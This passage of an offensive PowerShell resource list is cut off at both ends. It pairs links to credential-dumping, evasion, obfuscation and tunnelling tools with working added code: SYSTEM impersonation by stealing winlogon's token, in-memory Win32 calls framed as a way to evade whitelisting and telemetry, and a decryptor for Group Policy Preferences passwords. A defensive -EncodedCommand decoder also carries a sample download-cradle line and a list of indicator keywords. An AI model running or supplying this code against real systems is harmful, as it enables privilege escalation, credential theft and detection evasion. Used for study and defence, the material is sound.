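    $SecurityImpersonation     = 2     # SECURITY_IMPERSONATION_LEVEL
    $TokenImpersonation        = 2     # TOKEN_TYPE: 1 = primary, 2 = impersonation

    # SeDebugPrivilege is present but disabled in an elevated admin token; this enables it.
    try { [System.Diagnostics.Process]::EnterDebugMode() }
    catch { throw "Could not enable SeDebugPrivilege (run elevated): $($_.Exception.Message)" }

    $hProc = $tokenApi::OpenProcess($PROCESS_QUERY_INFORMATION, $false, $ProcessId)
    if ($hProc -eq [IntPtr]::Zero) { throw "OpenProcess failed: $([ComponentModel.Win32Exception]::new().Message)" }
    $hToken = [IntPtr]::Zero; $hDup = [IntPtr]::Zero
    try {
        if (-not $tokenApi::OpenProcessToken($hProc, $TOKEN_DUPLICATE -bor $TOKEN_QUERY, [ref]$hToken)) {
            throw "OpenProcessToken failed: $([ComponentModel.Win32Exception]::new().Message)"
        }
        if (-not $tokenApi::DuplicateTokenEx($hToken, $MAXIMUM_ALLOWED, [IntPtr]::Zero,
                $SecurityImpersonation, $TokenImpersonation, [ref]$hDup)) {
            throw "DuplicateTokenEx failed: $([ComponentModel.Win32Exception]::new().Message)"
        }
        if (-not $tokenApi::ImpersonateLoggedOnUser($hDup)) {
            throw "ImpersonateLoggedOnUser failed: $([ComponentModel.Win32Exception]::new().Message)"
        }
        try     { & $ScriptBlock }
        finally { [void]$tokenApi::RevertToSelf() }      # always drop the impersonation, even on error
    } finally {
        foreach ($h in $hDup, $hToken, $hProc) {
            if ($h -ne [IntPtr]::Zero) { [void]$tokenApi::CloseHandle($h) }
        }
    }
}

# Show the thread identity flipping to SYSTEM and back.
$before   = [Security.Principal.WindowsIdentity]::GetCurrent().Name
$winlogon = (Get-Process winlogon | Select-Object -First 1).Id
$during   = Invoke-TokenImpersonation -ProcessId $winlogon -ScriptBlock {
    [Security.Principal.WindowsIdentity]::GetCurrent().Name
}
$after    = [Security.Principal.WindowsIdentity]::GetCurrent().Name
[pscustomobject]@{ Before = $before; During = $during; After = $after }
```

Impersonation is per thread, which is why the scriptblock runs inline and `RevertToSelf` sits in a `finally`: anything that hops threads (runspace jobs, `Start-Job`) runs as the original user, and to spawn a new process as SYSTEM you need a primary token (TokenType 1) and CreateProcessWithTokenW or CreateProcessAsUser instead.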

Articles/Blogposts/Writeups

Tools

WinAPI Access

Articles/Blogposts/Writeups
-Accessing the Windows API in PowerShell via internal .NET methods and reflection - @mattifestation(2012)
  - It is possible to invoke Windows API function calls via internal .NET native method wrappers in PowerShell without requiring P/Invoke or C# compilation. How is this useful for an attacker? You can call any Windows API function (exported or non-exported) entirely in memory. For those familiar with Metasploit internals, think of this as an analogue to railgun.
- List All Win32/Native Functions Declared/Used By PowerShell - @mattifestation(2012)
- Deep Reflection - Defining Structs and Enums in PowerShell - @mattifestation(2012)
- Get-PEB – A Tool to Dump the Process Environment Block (PEB) of Any Process - @mattifestation(2013)
- Low-Level Windows API Access From PowerShell - b33f
- PowerShell and Win32 API Access - harmj0y(2014)
- Easily Defining Enums, Structs, and Win32 Functions in Memory - @mattifestation(2014)
- Use PowerShell to Interact with the Windows API: Part 1 - devblogs.msdn(2014)
- Properly Retrieving Win32 API Error Codes in PowerShell - @mattifestation(2016)
- Writing about Windows API functions in Powershell - Dmitriy Kim(2020)

Tools
- PSReflect
  - Easily define in-memory enums, structs, and Win32 functions in PowerShell.
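The two routes to the Win32 API that the Add-Type & Reflection and WinAPI Access entries describe, side by side, as an added example that is not PSReflect's code. Route 1 is `Add-Type`, which in Windows PowerShell compiles the C# through csc.exe and a temporary DLL under `%TEMP%` before loading it. Route 2 uses `System.Reflection.Emit` to define the P/Invoke stub directly inside a dynamic in-memory assembly, which is the approach PSReflect generalises; nothing is compiled or written to disk. Both call `kernel32!GetCurrentProcessId` and must agree with `$PID`. The assembly, module and type names are arbitrary choices of this example.

```powershell
# Route 1: Add-Type. Concise, but spawns csc.exe and leaves a temp assembly on disk (Windows PowerShell).
$k32 = Add-Type -Namespace Demo -Name Kernel32 -PassThru -MemberDefinition @'
[DllImport("kernel32.dll")] public static extern uint GetCurrentProcessId();
'@
$viaAddType = $k32::GetCurrentProcessId()

# Route 2: Reflection.Emit. The P/Invoke signature is emitted into a dynamic assembly in memory.
function New-InMemoryPInvoke {
    param(
        [Parameter(Mandatory)][string]$Dll,        # e.g. kernel32.dll
        [Parameter(Mandatory)][string]$Function,   # exported symbol name
        [Parameter(Mandatory)][type]$ReturnType,
        [type[]]$ParameterTypes = @()
    )
    $name   = New-Object System.Reflection.AssemblyName('InMemoryWin32')
    $access = [System.Reflection.Emit.AssemblyBuilderAccess]::Run
    # Windows PowerShell (.NET Framework) exposes DefineDynamicAssembly on AppDomain,
    # PowerShell 7 (.NET Core) only on AssemblyBuilder.
    $asm = if ($PSVersionTable.PSEdition -eq 'Core') {
        [System.Reflection.Emit.AssemblyBuilder]::DefineDynamicAssembly($name, $access)
    } else {
        [AppDomain]::CurrentDomain.DefineDynamicAssembly($name, $access)
    }
    $mod = $asm.DefineDynamicModule('InMemoryModule')
    $tb  = $mod.DefineType("Win32.$($Dll -replace '\.dll$', '')", 'Public,Class')
    $mb  = $tb.DefinePInvokeMethod($Function, $Dll,
               [System.Reflection.MethodAttributes]'Public,Static,PinvokeImpl',
               [System.Reflection.CallingConventions]::Standard,
               $ReturnType, $ParameterTypes,
               [System.Runtime.InteropServices.CallingConvention]::Winapi,
               [System.Runtime.InteropServices.CharSet]::Auto)
    # PreserveSig: return the native value as-is instead of turning HRESULTs into exceptions
    $mb.SetImplementationFlags([System.Reflection.MethodImplAttributes]::PreserveSig)
    $tb.CreateType()
}

$k32mem        = New-InMemoryPInvoke -Dll 'kernel32.dll' -Function 'GetCurrentProcessId' -ReturnType ([uint32])
$viaReflection = $k32mem::GetCurrentProcessId()

[pscustomobject]@{
    PID           = $PID
    ViaAddType    = $viaAddType
    ViaReflection = $viaReflection
    Agree         = ($viaAddType -eq $PID) -and ($viaReflection -eq $PID)
}
```

Route 2 is what you reach for when csc.exe is blocked by application whitelisting or when a child compiler process would stand out in process-creation telemetry; the cost is verbosity, which is exactly what PSReflect's `Add-Win32Type` wraps. Re-running Route 1 in the same session fails because the Demo.Kernel32 type already exists; Route 2 fails the same way for a duplicate assembly name, so give each definition its own name or cache the type.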

Persistence

Articles/Blogposts/Writeups
- Practical Persistence with PowerShell - Matt Graeber(2013)
- Nothing Lasts Forever: Persistence with Empire - harmj0y(2016)

Credential Attacks

Articles/Blogposts/Writeups

Process Dump
- Dump-Clear-Text-Password-after-KB2871997-installed
  - Auto-starts WDigest authentication, locks the screen, detects the user logging back on, and grabs the clear-text password.
- Out-Minidump.ps1
  - Generates a full-memory minidump of a process.
- MimiDbg
  - PowerShell one-liner to retrieve WDigest passwords from memory.
- PowerMemory
  - Exploits the credentials present in files and memory. PowerMemory leverages Microsoft-signed binaries to attack Microsoft operating systems.
- mimikittenz
  - mimikittenz is a post-exploitation PowerShell tool that uses the Windows function ReadProcessMemory() to extract plain-text passwords from various target processes.

GPO
- PShell Script: Extract All GPO Set Passwords From Domain
  - This script parses the domain's Policies folder looking for Groups.xml files. These files contain a username change, a password setting, or both, which gives you the raw data for local accounts and/or passwords enforced through Group Policy Preferences. Microsoft chose to use a static AES key for encrypting this password. How awesome is that!
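The decryption step that script (and PowerSploit's Get-GPPPassword) relies on, as an added example rather than the linked script's code. Group Policy Preferences encrypted the `cpassword` attribute with AES-256-CBC, an all-zero IV and the fixed 32-byte key Microsoft published in its MSDN documentation (the bytes below), so anyone who can read SYSVOL can recover the plaintext. Because no real Groups.xml can be embedded here, the sample is constructed by encrypting a known password with the same key and parameters, so the round trip runs offline; the user name, password and timestamp in it are invented for the example.

```powershell
# The published GPP AES key (from MSDN's Group Policy Preferences password documentation).
$GppKey = [byte[]](0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
                   0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)

function New-GppAes {
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Key     = $GppKey
    $aes.IV      = New-Object byte[] 16     # GPP uses a zero IV
    $aes.Mode    = 'CBC'
    $aes.Padding = 'PKCS7'
    $aes
}

function ConvertFrom-GppCPassword {
    param([Parameter(Mandatory)][string]$CPassword)
    # GPP strips the Base64 '=' padding; restore it to a multiple of four characters.
    $pad    = (4 - $CPassword.Length % 4) % 4
    $cipher = [Convert]::FromBase64String($CPassword + ('=' * $pad))
    $aes = New-GppAes
    try {
        $plain = $aes.CreateDecryptor().TransformFinalBlock($cipher, 0, $cipher.Length)
        [Text.Encoding]::Unicode.GetString($plain)     # stored as UTF-16LE
    } finally { $aes.Dispose() }
}

function ConvertTo-GppCPassword {
    # Only needed to build the constructed sample; attackers never need this direction.
    param([Parameter(Mandatory)][string]$Password)
    $aes = New-GppAes
    try {
        $bytes  = [Text.Encoding]::Unicode.GetBytes($Password)
        $cipher = $aes.CreateEncryptor().TransformFinalBlock($bytes, 0, $bytes.Length)
        [Convert]::ToBase64String($cipher).TrimEnd('=')
    } finally { $aes.Dispose() }
}

function Get-GppPasswordFromXml {
    param([Parameter(Mandatory)][xml]$Xml)
    # Groups.xml: <User ...><Properties userName="..." cpassword="..." .../></User>
    foreach ($u in $Xml.SelectNodes('//User')) {
        $p = $u.Properties
        if ($p.cpassword) {
            [pscustomobject]@{
                UserName = $p.userName
                Password = ConvertFrom-GppCPassword $p.cpassword
                Changed  = $u.changed
            }
        }
    }
}

# Constructed sample, shaped like \\<domain>\SYSVOL\<domain>\Policies\<GUID>\Machine\Preferences\Groups\Groups.xml
# (clsid and other attributes omitted).
$sampleCPassword = ConvertTo-GppCPassword 'LocalAdm1n!'
$sampleXml = [xml]@"
<Groups>
  <User name="LocalAdmin" changed="2024-01-15 10:22:01">
    <Properties action="U" newName="" fullName="" description="" cpassword="$sampleCPassword" userName="LocalAdmin"/>
  </User>
</Groups>
"@
Get-GppPasswordFromXml -Xml $sampleXml
```

The same `cpassword` attribute appears in Services.xml, ScheduledTasks.xml, DataSources.xml and Drives.xml, so a real sweep walks all of `Preferences`, not only `Groups`. MS14-025 removed the ability to set new passwords this way but left existing entries in SYSVOL, which is why the script above still finds them.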

Mimikatz
- mimikittenz
  - A post-exploitation PowerShell tool for extracting juicy info from memory.

Broadcast Name Resolution Poisoning (BNRP)
- Inveigh
  - Inveigh is a PowerShell LLMNR/mDNS/NBNS spoofer and man-in-the-middle tool designed to assist penetration testers/red teamers who find themselves limited to a Windows system.

Privilege Escalation

Local Phishing

Tools
- PowerUp
  - PowerUp is a PowerShell tool to assist with local privilege escalation on Windows systems. It contains several methods to identify and abuse vulnerable services, as well as DLL hijacking opportunities, vulnerable registry settings, and other escalation opportunities.
- Sherlock
  - PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities.
- Get-System-Techniques

Lateral Movement

DCOM

PS-Remoting
- Secrets of PowerShell Remoting - Don Jones, Tobias Weltner(2018)
  - Introduced in Windows PowerShell 2.0, Remoting is one of PowerShell's most useful, and most important, core technologies. It enables you to run almost any command that exists on a remote computer, opening up a universe of possibilities for bulk and remote administration. Remoting underpins other technologies, including Workflow, Desired State Configuration, certain types of background jobs, and much more. This guide isn't intended to be a complete document of what Remoting is and does, although it does provide a good introduction. Instead, this guide is designed to document all the little configuration details that don't appear to be documented elsewhere.

ScheduleTask
- Invoke-CommandAs
  - Invoke a command as SYSTEM or as another user on a local or remote computer using a scheduled task.
Evasion
- Articles/Blogposts/Writeups
-
Talks/Presentations/Videos
-
PowerShell Secrets and Tactics - Ben0xA(Derbycon2016)
- It used to be that most people were just starting to hear about PowerShell. Over the last 3 years, this has changed dramatically. We now see Offensive and Defensive PowerShell tools, exploits specifically leveraging PowerShell and WMI, and more organizations are starting to be intentional for detection and monitoring of PowerShell scripts and commands. With this visibility, it is becoming a game of cat and mouse to leverage and detect PowerShell. In this talk, I will highlight some secrets I use to ensure my PowerShell exploits are successful and some unique tactics which will bypass common defensive controls. I will also walk you through the creation of a custom PowerShell C# DLL which you can use to compromise your target. If you want to code with me, be sure to bring a laptop with Visual Studio 2013 or later installed.
-
Goodbye Obfuscation, Hello Invisi Shell: Hiding Your Powershell Script in Plain Sight - Omer Yair(Derbycon2018)
- “The very concept of objective truth is fading out of the world. Lies will pass into history.” George Orwell. Objective truth is essential for security. Logs, notifications and saved data must reflect the actual events for security tools, forensic teams and IT managers to perform their job correctly. Powershell is a prime example of the constant cat and mouse game hackers and security personnel play every day to either reveal or hide the “objective truth” of a running script. Powershell’s auto logging, obfuscation techniques, AMSI and more are all participants of the same game playing by the same rules. We don’t like rules, so we broke them. As a result, Babel-Shellfish and Invisi-Shelltwo new tools that both expose and disguise powershell scripts were born. Babel-Shellfish reveals the inner hidden code of any obfuscated script while Invisi-Shell offers a new method of hiding malicious scripts, even from the Powershell process running it. Join us as we present a new way to think about scripts.
- APTs <3 PowerShell and Why You Should Too - Anthony Rose, Jake Krasnov(DefconSafeMode RTV 2020)
-
PowerShell Secrets and Tactics - Ben0xA(Derbycon2016)
- Tools
- HiddenPowerShellDll
  - This .NET class library is used to run PowerShell scripts from C#. The bypasses are executed and then the scriptblock that invokes the stager is executed. Using the DllExport package the .NET DLL exports a function that allows it to be executed via rundll32, and this results in a bypass of the default AppLocker rules.
- Constrained-Language Mode
  - See above.
- Crypters
- Xencrypt
  - This tool is intended as a demo for how easy it is to write your own crypter. It works for its intended purpose and I will not patch it to make it suitable for yours.
- Obfuscation
- Invoke-Obfuscation
  - Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.
- Articles/Blogposts/Writeups
- argfuscator - Obfuscating and randomizing PowerShell arguments - Jeff White(2017)
- Pulling Back the Curtains on EncodedCommand PowerShell Attacks - Jeff White(2017)
- PowerShell Obfuscation using SecureString - @Wietze(2020)
  - TL;DR - PowerShell has built-in functionality to save sensitive plaintext data to an encrypted object called SecureString. Malicious actors have exploited this functionality as a means to obfuscate PowerShell commands. This blog post discusses SecureString, examples seen in the wild, and presents a tool that helps analyse SecureString obfuscated commands.
- pOWershell obFUsCation - N1CFURY
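The EncodedCommand write-up above describes how attackers hide PowerShell behind `-EncodedCommand` (base64 of the script's UTF-16LE bytes, often nested several layers deep) and how defenders unwind it. The following Python is an added example, not code from any of the projects listed here: it peels nested `-enc` layers out of command-line log entries and flags common download-cradle indicators. Assumptions: powershell.exe resolves parameters by unambiguous prefix, so every prefix of `encodedcommand` plus the short form `ec` is accepted; the indicator list is a starter set; the sample log lines are constructed, not real telemetry.

```python
"""Decode and triage PowerShell -EncodedCommand command lines from log data."""
import base64
import re

# powershell.exe resolves parameters by unambiguous prefix, so -e, -en, -enc,
# -encodedc, ... all mean -EncodedCommand. Assumption: every prefix of the
# full name plus the documented short form -ec covers what shows up in logs.
_PREFIXES = ["encodedcommand"[:n] for n in range(1, len("encodedcommand") + 1)] + ["ec"]
_ENC_RE = re.compile(
    r"(?i)(?<![\w-])-(?:" + "|".join(sorted(_PREFIXES, key=len, reverse=True))
    + r")\s+([A-Za-z0-9+/=]{8,})"
)

# Strings worth a closer look once the command is decoded.
# Assumption: a starter list, not a complete signature set.
_INDICATORS = (
    "iex", "invoke-expression", "downloadstring", "downloadfile",
    "net.webclient", "frombase64string", "-nop", "-noni", "-w hidden",
)


def encode_command(script: str) -> str:
    """What powershell.exe expects after -EncodedCommand: base64(UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(b64: str) -> str:
    """Reverse of encode_command; tolerates stripped '=' padding."""
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))
    return raw.decode("utf-16-le", errors="replace")


def analyze(cmdline: str, max_depth: int = 5) -> dict:
    """Peel nested -EncodedCommand layers and collect indicators."""
    layers = []
    current = cmdline
    for _ in range(max_depth):
        m = _ENC_RE.search(current)
        if not m:
            break
        try:
            current = decode_command(m.group(1))
        except ValueError:  # binascii.Error is a ValueError subclass
            break
        layers.append(current)
    # Search indicators with the base64 blobs blanked out, so that random
    # base64 letters cannot produce false hits such as "iex".
    texts = [_ENC_RE.sub(" ", t).lower() for t in [cmdline] + layers]
    haystack = "\n".join(texts)
    return {
        "layers": layers,
        "final": current,
        "depth": len(layers),
        "indicators": sorted(i for i in _INDICATORS if i in haystack),
    }


# Constructed sample log lines (not real telemetry): a one-layer download
# cradle, a two-layer nested encoding, and a benign scripted run.
SAMPLE_LOGS = [
    "powershell.exe -nop -w hidden -enc "
    + encode_command("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"),
    "cmd.exe /c powershell -ec "
    + encode_command("powershell.exe -e " + encode_command("Write-Host 'nested'")),
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1",
]


def triage(lines=SAMPLE_LOGS) -> list:
    """Run analyze over many lines; keep only encoded or indicator-bearing ones."""
    out = []
    for line in lines:
        r = analyze(line)
        if r["depth"] or r["indicators"]:
            out.append((line[:60], r["depth"], r["final"], r["indicators"]))
    return out


if __name__ == "__main__":
    for short, depth, final, hits in triage():
        print(f"depth={depth} hits={hits}\n  {final}")
```

Blanking the base64 blobs before keyword matching matters: UTF-16LE base64 is long runs of pseudo-random letters, and a three-letter indicator like `iex` will eventually appear inside one by chance.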
- Talks/Presentations/Videos
- Defeating The Latest Advances in Script Obfuscation - Mark Mager(Derbycon2016)
  - Mark Mager (@magerbomb): In this age of increasingly sophisticated and devastating malware, adversaries still rely on a multitude of scripting languages and frameworks (e.g. JavaScript, VBA, PowerShell, VBScript) as key components of an attack scenario. These scripts tend to employ obfuscation techniques in order to obscure their true intent and avoid detection by endpoint protection products. Though significant advances have been made in recent years in packing and obfuscating compiled binaries, script obfuscation can still be defeated with time and a determined analyst. This talk will cover some of the most recently seen advanced obfuscation techniques employed by APTs, exploit kits, and other malware authors along with proven methods for circumventing and decoding these techniques. I will then apply these methods to guide the audience through the deobfuscation of a fully obfuscated script. Audience members will walk away with a solid understanding of how common obfuscation techniques are employed in scripting languages along with how they can be defeated.
- Invoke-CradleCrafter: Moar PowerShell obFUsk8tion by Daniel Bohannon
- Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niques') -Join'') - Daniel Bohannon(Derbycon2017)
  - Attackers, administrators and many legitimate products rely on PowerShell for their core functionality. However, its power has made it increasingly attractive for attackers and commodity malware authors alike. How do you separate the good from the bad? A/V signatures applied to command line arguments work sometimes. AMSI-based (Anti-malware Scan Interface) detection performs significantly better. But obfuscation and evasion techniques like Invoke-Obfuscation can and do bypass both approaches. Revoke-Obfuscation is a framework that transforms evasion into a treacherous deceit. By applying a suite of unique statistical analysis techniques against PowerShell scripts and their structures, what was once a cloak of invisibility is now a spotlight. It works with .evtx files, command lines, scripts, ScriptBlock logs, Module logs, and is easy to extend. Approaches for evading these detection techniques will be discussed and demonstrated. Revoke-Obfuscation has been used in numerous Mandiant investigations to successfully identify obfuscated and non-obfuscated malicious PowerShell scripts and commands. It also detects all obfuscation techniques in Invoke-Obfuscation, including two new techniques being released with this presentation.
- Tools
- PyFuscation
  - Obfuscate PowerShell scripts by replacing function names, variables and parameters.
- Invoke-CradleCrafter v1.1
- Invoke-Confusion.ps1
- PowerAvails
- Powerob
  - An on-the-fly PowerShell script obfuscator meant for red team engagements. Built out of necessity.
- Powerglot
  - Powerglot encodes offensive PowerShell scripts using polyglots.
- De-Obfuscate
- Revoke-Obfuscation
- Articles/Blogposts/Writeups
- Tools
- PowerShell: ConvertFrom-SecureString decoder
  - A simple, pure JavaScript implementation decoding PowerShell's SecureString objects for analysis.
- Babel-Shellfish
  - Deobfuscate PowerShell scripts right before execution. Babel-Shellfish lets you both log and scan through AMSI-deobfuscated scripts. If a script is found malicious it will stop its execution.
- CLM-Base64
  - Blogpost
  - This project provides Base64 encoding and decoding functionality to PowerShell within Constrained Language Mode. Since this is constrained language mode compliant, it will also run in Full Language Mode.
- PowerAvails
  - PowerAvails Powershell .NET Operating system
- Exfiltration
- Articles/Blogposts/Writeups
- Payloads
- Talks/Presentations/Videos
- Malicious payloads vs. deep visibility: a PowerShell story - Daniel Bohannon(PSConEU19)
  - This talk draws from over four years of Incident Response experience to lay out a technical buffet of in-the-wild malicious PowerShell payloads and techniques. In addition to diving deep into the mechanics of each malicious example, this presentation will highlight forensic artifacts, detection approaches and the deep visibility that the latest versions of PowerShell provides security practitioners to defend their organizations against the latest attacks that utilize PowerShell.
- Generators
- nps_payload
  - This script will generate payloads for basic intrusion detection avoidance. It utilizes publicly demonstrated techniques from several different sources.
- psWar.py
  - Code that quickly generates a deployable .war for a PowerShell one-liner
- Samples
- JSRat-Py
  - Implementation of JSRat.ps1 in Python so you can now run the attack server from any OS instead of being limited to a Windows OS with PowerShell enabled.
- ps1-toolkit
  - This is a set of PowerShell scripts that are used by many penetration testers released by multiple leading professionals. This is simply a collection of scripts that are prepared and obfuscated to reduce level of detectability and to slow down incident response from understanding the actions performed by an attacker.
- Signatures
- DigitalSignature-Hijack.ps1
- PoCSubjectInterfacePackage
  - A proof-of-concept subject interface package (SIP) used to demonstrate digital signature subversion attacks.
- Talks/Presentations/Videos
- Miscellaneous Useful Things
- Invoke-VNC
  - PowerShell VNC injector
- Invoke-BSOD
  - A PowerShell script to induce a Blue Screen of Death (BSOD) without admin privileges. Also enumerates Windows crash dump settings. This is a standalone script, it does not depend on any other files.
- Invoke-SocksProxy
  - Creates a SOCKS proxy using PowerShell.
- PowerShell-Suite
  - There are great tools and resources online to accomplish most any task in PowerShell, sometimes however, there is a need to script together a util for a specific purpose or to bridge an ontological gap. This is a collection of PowerShell utilities I put together either for fun or because I had a narrow application in mind. - b33f
- Powershell-SSHTools
  - A bunch of useful SSH tools for PowerShell
- random-powershell
  - Various PowerShell scripts that have come in handy but aren't important enough for their own repository
- Utilities
- 7Zip4Powershell
  - PowerShell module for creating and extracting 7-Zip archives
- Servers
- Dirty Powershell Webserver
- Pode
  - Pode is a PowerShell framework that runs HTTP/TCP listeners on a specific port, allowing you to host REST APIs, Web Pages and SMTP/TCP servers via PowerShell. It also allows you to render dynamic HTML using PSHTML files.
- PowerHub
  - Webserver frontend for PowerSploit with functionality and niceness.
- Harness
  - Harness is a remote access payload with the ability to provide a remote interactive PowerShell interface from a Windows system to virtually any TCP socket. The primary goal of the Harness Project is to provide a remote interface with the same capabilities and overall feel of the native PowerShell executable bundled with the Windows OS.
Pivoting & Tunneling
- Pivoting
- Articles/Writeups
- A Red Teamer's guide to pivoting
- Pivoting into a network using PLINK and FPipe
- Pillage the Village Redux w/ Ed Skoudis & John Strand - SANS
- Browser Pivot for Chrome - cplsec
- Browser Pivoting (Get past two-factor auth) - blog.cobaltstrike
- Windows Domains, Pivot & Profit - Fuzzynop
  - Hola! In this write-up we will be looking at different ways to move laterally when compromising a Windows domain. This post is by no means exhaustive but it should cover some of the more basic techniques and thought processes.
- Bash
- Metasploit
- SSH
- Pivoting Ssh Reverse Tunnel Gateway
- SSH Gymnastics and Tunneling with ProxyChains
- SSH Cheat Sheet - pentestmonkey
- proxychains-ng
  - proxychains-ng (new generation): a preloader which hooks calls to sockets in dynamically linked programs and redirects them through one or more SOCKS/HTTP proxies. Continuation of the unmaintained proxychains project; the sf.net page is no longer updated, so use releases from the GitHub release page instead.
- Using sshuttle in daily work - Huiming Teo
- Proxyjump, the SSH option you probably never heard of - Khris Tolbert(2020)
- VPN
- WMIC
- Tools
- Socat
  - socat is a relay for bidirectional data transfer between two independent data channels. Each of these data channels may be a file, pipe, device (serial line etc. or a pseudo terminal), a socket (UNIX, IP4, IP6 - raw, UDP, TCP), an SSL socket, proxy CONNECT connection, a file descriptor (stdin etc.), the GNU line editor (readline), a program, or a combination of two of these. These modes include generation of "listening" sockets, named pipes, and pseudo terminals.
  - Examples of use
  - Socat Cheatsheet
- XFLTReaT
  - XFLTReaT tunnelling framework
- Discovery
- nextnet
  - nextnet is a pivot point discovery tool written in Go.
- DNS
- HTTP/HTTPS
- SharpSocks
  - Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell
- Chisel
  - Chisel is a fast TCP tunnel, transported over HTTP, secured via SSH. Single executable including both client and server. Written in Go (golang). Chisel is mainly useful for passing through firewalls, though it can also be used to provide a secure endpoint into your network.
- SharpChisel
  - C# Wrapper of Chisel from https://github.com/jpillora/chisel
- Crowbar
  - Crowbar is an EXPERIMENTAL tool that allows you to establish a secure circuit with your existing encrypting TCP endpoints (an OpenVPN setup, an SSH server for forwarding...) when your network connection is limited by a Web proxy that only allows basic port 80 HTTP connectivity. Crowbar will tunnel TCP connections over an HTTP session using only GET and POST requests. This is in contrast to most tunneling systems that reuse the CONNECT verb. It also provides basic authentication to make sure nobody who stumbles upon the server steals your proxy to order drugs from Silkroad.
- A Black Path Toward The Sun(ABPTTS)
  - ABPTTS uses a Python client script and a web application server page/package[1] to tunnel TCP traffic over an HTTP/HTTPS connection to a web application server. In other words, anywhere that one could deploy a web shell, one should now be able to establish a full TCP tunnel. This permits making RDP, interactive SSH, Meterpreter, and other connections through the web application server.
- pivotnacci
  - Pivot into the internal network by deploying HTTP agents. Pivotnacci allows you to create a SOCKS server which communicates with HTTP agents.
- graftcp
  - graftcp can redirect the TCP connection made by the given program [application, script, shell, etc.] to a SOCKS5 or HTTP proxy.
- Tunna
  - Tunna is a set of tools which will wrap and tunnel any TCP communication over HTTP. It can be used to bypass network restrictions in fully firewalled environments.
- HTTP2
- gTunnel
  - A TCP tunneling suite built with golang and gRPC. gTunnel can manage multiple forward and reverse tunnels that are all carried over a single TCP/HTTP2 connection. I wanted to learn a new language, so I picked go and gRPC. Client executables have been tested on windows and linux.
- ICMP
- Hans - IP over ICMP - hans
  - Source
  - Hans makes it possible to tunnel IPv4 through ICMP echo packets, so you could call it a ping tunnel. This can be useful when you find yourself in the situation that your Internet access is firewalled, but pings are allowed.
- icmptx
  - ICMPTX is a program that allows a user with root privileges to create a virtual network link between two computers, encapsulating data inside of ICMP packets.
- PowerShell
- RDP
- Socks Over RDP / Socks Over Citrix
  - This tool adds the capability of a SOCKS proxy to Terminal Services (or Remote Desktop Services) and Citrix (XenApp/XenDesktop). It uses a Dynamic Virtual Channel that enables us to communicate over an open RDP/Citrix connection without the need to open a new socket, connection or a port on a firewall.
  - Socks Over RDP - Balazs Bucsay(2020)
- SMB
- Piper
  - Creates a local or remote port forwarding through named pipes.
- flatpipes
  - A TCP proxy over named pipes. Originally created for maintaining a meterpreter session over 445 for less network alarms.
- Invoke-PipeShell
  - This script demonstrates a remote command shell running over an SMB Named Pipe. The shell is interactive PowerShell or single PowerShell commands.
- Invoke-Piper
  - Forward local or remote TCP ports through SMB pipes.
- SSH
- SSHDog
  - SSHDog is your go-anywhere lightweight SSH server. Written in Go, it aims to be a portable SSH server that you can drop on a system and use for remote access without any additional configuration.
- MeterSSH
  - MeterSSH is a way to take shellcode, inject it into memory then tunnel whatever port you want to over SSH to mask any type of communications as a normal SSH connection. The way it works is by injecting shellcode into memory, then wrapping a port spawned (meterpreter in this case) by the shellcode over SSH back to the attacker's machine. Then connecting with meterpreter's listener to localhost will communicate through the SSH proxy, to the victim through the SSH tunnel. All communications are relayed through the SSH tunnel and not through the network.
- powermole
  - This program will let you perform port forwarding, redirect internet traffic, and transfer files to, and issue commands on, a host without making a direct connection (i.e. via one or more intermediate hosts), which would undoubtedly compromise your privacy. This solution can only work when you or your peers own one or more hosts as this program communicates with SSH servers. This program can be viewed as a multi-versatile wrapper around SSH with the ProxyJump directive enabled. Powermole automatically creates an ssh/scp configuration file to enable key-based authentication with the intermediate hosts.
- SOCKS/TCP/UDP
- RFC1928: SOCKS Protocol Version 5
- SOCKS: A protocol for TCP proxy across firewalls
- shootback
  - shootback is a reverse TCP tunnel that lets you access a target behind NAT or a firewall.
- ssf - Secure Socket Funneling
  - Network tool and toolkit. It provides simple and efficient ways to forward data from multiple sockets (TCP or UDP) through a single secure TLS tunnel to a remote computer. SSF is cross platform (Windows, Linux, OSX) and comes as standalone executables.
- PowerCat
  - A PowerShell TCP/IP swiss army knife that works with Netcat & Ncat
- Udp2raw-tunnel
  - A tunnel which carries UDP over FakeTCP/UDP/ICMP traffic using raw sockets, helping you bypass UDP firewalls (or unstable UDP environments). It is encrypted, anti-replay and multiplexed. It also acts as a connection stabilizer.
- reGeorg
  - The successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.
- redsocks – transparent TCP-to-proxy redirector
  - This tool allows you to redirect any TCP connection to a SOCKS or HTTPS proxy using your firewall, so redirection may be system-wide or network-wide.
- ligolo
  - Ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptic curve). It is comparable to Meterpreter with Autoroute + Socks4a, but more stable and faster.
- proxychains-windows
  - Windows and Cygwin port of proxychains, based on MinHook and DLL Injection
- rpivot
  - This tool is Python 2.6-2.7 compatible and has no dependencies beyond the standard library. It has a client-server architecture. Just run the client on the machine you want to tunnel the traffic through. The server should be started on the pentester's machine and listen for incoming connections from the client.
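RFC 1928 above defines the SOCKS5 exchange that proxychains, `ssh -D`, Chisel, reGeorg and the other SOCKS tools in this section speak: a method-selection greeting, a request carrying the target address and port, and a reply with the result code and bound address. The following Python is an added example, not code from any of those tools: it builds and parses every message of a CONNECT exchange from both the client and the server side, so a handshake captured on the wire can be inspected, or a minimal relay written against it. It assumes the no-authentication method (0x00) only; RFC 1929 username/password authentication, BIND and UDP ASSOCIATE are left out, and the target names used are constructed.

```python
"""Minimal SOCKS5 (RFC 1928) message encoding and parsing, both sides."""
import socket
import struct

VER = 0x05
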